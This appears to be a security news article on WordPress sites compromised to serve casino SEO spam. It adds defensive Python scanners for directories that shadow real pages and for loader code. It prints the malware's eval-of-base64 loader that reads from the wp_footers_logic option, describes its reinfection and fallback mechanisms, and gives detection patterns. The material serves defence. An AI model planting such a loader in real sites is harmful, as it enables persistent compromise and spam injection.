Cybercriminals are increasingly targeting websites to inject malicious links and boost their search engine optimization rankings through sophisticated blackhat SEO tactics.
This campaign primarily focuses on online casino spam, which has become the most prevalent type of spam content affecting compromised websites.
Attackers exploit vulnerabilities in WordPress installations to insert spam content promoting online casinos, particularly those targeting international markets where gambling remains heavily regulated.
The attackers employ multiple techniques to maintain persistence and evade detection. They hijack legitimate website pages by creating duplicate directories with identical names, effectively replacing original content with spam-filled landing pages.
When visitors or search engines attempt to access pages, they are redirected to bogus directories containing links to undesirable casino websites.
This technique exploits the order in which Apache and Nginx resolve requests: both servers first check whether a real file or directory matches the requested path and serve it directly, falling through to WordPress's rewrite rules only when nothing matches on disk. A directory that shares its name with a legitimate page therefore shadows that page before WordPress ever sees the request.
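A defender can check for this shadowing directly on disk. The following is an added example, not code from the article or from Sucuri: given the site's webroot and the slugs of its pages (assumed to come from the WordPress database or a sitemap), it reports any slug for which a real directory with an index file exists, which is exactly the condition under which the web server serves the spam page instead of WordPress. The throwaway webroot it builds is constructed for the demonstration.

```python
import os
import tempfile

# Constructed sample: page slugs that WordPress should serve via rewrite
# rules. In practice, pull these from wp_posts or the site's sitemap.
SAMPLE_SLUGS = ["about-us", "contact", "blog"]

# Index filenames Apache/Nginx will serve directly when a directory of the
# same name exists, short-circuiting WordPress's rewrite rules.
INDEX_FILES = ("index.php", "index.html", "index.htm")


def find_shadow_directories(webroot, slugs):
    """Return (slug, [index files]) for every slug that has a real directory
    with an index file in the webroot. Such a directory is served by the web
    server before the request reaches WordPress, hijacking the page."""
    hits = []
    for slug in slugs:
        candidate = os.path.join(webroot, slug)
        if not os.path.isdir(candidate):
            continue
        present = [f for f in INDEX_FILES
                   if os.path.isfile(os.path.join(candidate, f))]
        if present:
            hits.append((slug, present))
    return hits


def build_sample_webroot():
    """Construct a temporary webroot (assumed layout, not a real site) with
    one legitimate WordPress directory and one hijack directory named after
    the 'about-us' page, so the scanner can be exercised offline."""
    root = tempfile.mkdtemp(prefix="wp-shadow-scan-")
    os.makedirs(os.path.join(root, "wp-content", "themes"))
    hijack = os.path.join(root, "about-us")
    os.makedirs(hijack)
    with open(os.path.join(hijack, "index.html"), "w", encoding="utf-8") as fh:
        fh.write("<html><body>casino spam landing page</body></html>\n")
    return root


if __name__ == "__main__":
    root = build_sample_webroot()
    for slug, files in find_shadow_directories(root, SAMPLE_SLUGS):
        print(f"page '/{slug}/' is shadowed by a real directory containing {files}")
```

Run it against a production webroot with the real slug list; any hit is either a deliberate static directory you know about or a hijack to investigate.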
Sucuri security researchers identified a particularly sophisticated variant of this malware that incorporates multiple layers of redundancy.
The malicious code is strategically planted in both theme and plugin files to ensure survival even if one component is discovered.
Rather than creating easily detectable spam directories, this advanced version stores its payload within the WordPress database using deceptive option names.
Multi-Layered Infection Mechanism
The infection operates through clever database manipulation and dynamic content fetching.
Researchers discovered malicious code embedded at the bottom of the theme’s functions.php file.
The code retrieves a base64-encoded payload from the database using the option name wp_footers_logic and executes it through PHP's eval() function:
    $cloak = get_option('wp_footers_logic');   // read the stored payload from wp_options
    if ($cloak) {
        $decoded = base64_decode($cloak);      // decode it back to PHP source
        eval($decoded);                        // and execute it in the theme's context
    }
If eval() is disabled, the malware writes the payload to wp-content/cache/style.dat as a fallback mechanism. The decoded payload monitors incoming requests for specific URL paths and checks for cached spam content.
When triggered, it fetches content from attacker-controlled domains such as browsec[.]xyz. To ensure persistence, the attackers plant reinfection code in additional plugin files. This code periodically searches for distinctive markers left by the loader.
If the markers are missing, the code automatically re-appends the malicious payload to both the theme's functions.php file and the primary file of the first active plugin, so removing the loader from one location alone does not clean the site.
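Because the loader is small and the payload lives in wp_options, cleanup should check both the PHP files and the database. The following is an added example, not code from the article or from Sucuri: one function scans PHP source for the indicators the article describes (a read of the wp_footers_logic option, base64_decode feeding eval(), and a reference to the style.dat fallback file), and a second inspects wp_options rows for values that base64-decode to PHP-like code. The sample file contents and option rows are constructed for the demonstration; the decoded payload text is a placeholder, not the real one.

```python
import base64
import re

# Constructed sample: a clean functions.php and one with the loader appended.
CLEAN_FUNCTIONS_PHP = "<?php\nadd_theme_support('post-thumbnails');\n"
INFECTED_FUNCTIONS_PHP = CLEAN_FUNCTIONS_PHP + (
    "$cloak = get_option('wp_footers_logic');\n"
    "if ($cloak) {\n"
    "    $decoded = base64_decode($cloak);\n"
    "    eval($decoded);\n"
    "}\n"
)

# Constructed sample wp_options rows as (option_name, option_value). The
# payload text is a placeholder standing in for the real decoded loader.
SAMPLE_OPTIONS = [
    ("siteurl", "https://example.test"),
    ("blogname", "Example Site"),
    ("wp_footers_logic", base64.b64encode(
        b"if (isset($_SERVER['REQUEST_URI'])) { eval($fetched); }").decode()),
]

# Indicators taken from the article's description of the loader.
SOURCE_INDICATORS = {
    "reads wp_footers_logic option":
        re.compile(r"get_option\(\s*['\"]wp_footers_logic['\"]\s*\)"),
    "references fallback file wp-content/cache/style.dat":
        re.compile(r"wp-content/cache/style\.dat"),
}

# Things a base64-decoded option value should never contain.
PAYLOAD_MARKER = re.compile(r"\beval\s*\(|\$_SERVER\[|\$_GET\[|\$_POST\[|<\?php")


def scan_php_source(text):
    """Return the names of the loader indicators found in a PHP source file."""
    hits = [name for name, pattern in SOURCE_INDICATORS.items()
            if pattern.search(text)]
    # Decoding a stored blob and handing it to eval() is the core of the
    # loader; flag the pair regardless of the variable names used.
    if re.search(r"base64_decode\s*\(", text) and re.search(r"\beval\s*\(", text):
        hits.append("base64_decode feeding eval")
    return hits


def _decodes_to_php(value):
    """True if value is strict base64 whose decoded text looks like PHP code."""
    try:
        raw = base64.b64decode(value, validate=True)
        text = raw.decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return False
    return PAYLOAD_MARKER.search(text) is not None


def scan_options(rows):
    """Return option names whose values base64-decode to PHP-like code."""
    return [name for name, value in rows if _decodes_to_php(value)]


if __name__ == "__main__":
    print("functions.php:", scan_php_source(INFECTED_FUNCTIONS_PHP))
    print("suspicious options:", scan_options(SAMPLE_OPTIONS))
```

On a real site, feed scan_php_source the theme's functions.php and the main file of every active plugin (the reinfection code targets the first active plugin), and feed scan_options the full wp_options table rather than only the known option name, since the name is the easiest thing for the attackers to change.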